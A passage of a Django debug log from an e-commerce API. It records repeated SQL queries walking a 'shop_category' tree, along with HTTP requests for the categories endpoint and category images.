"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:30:10,607 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:30:10,609 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:30:10,612 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:30:10,614 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:30:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:30:44,175 utils 2749 140297254205184 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 09:30:44,182 utils 2749 140297254205184 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [27/Dec/2019 09:30:44] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-27 09:30:44,397 utils 2749 140297254205184 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:30:44,408 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:30:44,414 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:30:44,418 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:30:44,424 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:30:44,428 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:30:44,432 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:30:44,436 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:30:44,440 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:30:44,446 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:30:44,451 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:30:44,454 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:30:44,458 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:30:44,462 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:30:44,469 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:30:44,473 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:30:44,477 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:30:44,481 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:30:44,485 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:30:44,491 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:30:44,495 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:30:44,499 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:30:44,503 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:30:44,507 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:30:44,511 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:30:44,517 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:30:44,521 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:30:44,525 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:30:44,529 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:30:44,533 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:30:44,539 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:30:44,542 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:30:44,546 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:30:44,550 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:30:44,555 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:30:44,561 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:30:44,565 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:30:44,569 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:30:44,573 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:30:44,577 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:30:44,581 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:30:44,585 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:30:44,588 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:30:44,590 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:30:44,593 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:30:44,595 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:30:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 09:30:44] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [27/Dec/2019 09:30:44] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [27/Dec/2019 09:30:44] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [27/Dec/2019 09:30:44] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [27/Dec/2019 09:30:45] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [27/Dec/2019 09:30:45] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [27/Dec/2019 09:30:47] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [27/Dec/2019 09:30:47] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [27/Dec/2019 09:30:47] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [27/Dec/2019 09:30:48] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [27/Dec/2019 09:30:48] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [27/Dec/2019 09:30:48] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 DEBUG 2019-12-27 09:30:59,711 utils 2749 140297243715328 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:30:59,722 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:30:59,728 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:30:59,732 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:30:59,744 utils 2749 140297243715328 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:30:59,748 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:30:59,752 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:30:59,756 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:30:59,760 utils 2749 140297254205184 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-27 09:30:59,766 utils 2749 140297243715328 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:30:59,771 utils 2749 140297254205184 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:30:59,776 utils 2749 140297243715328 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:30:59,782 utils 2749 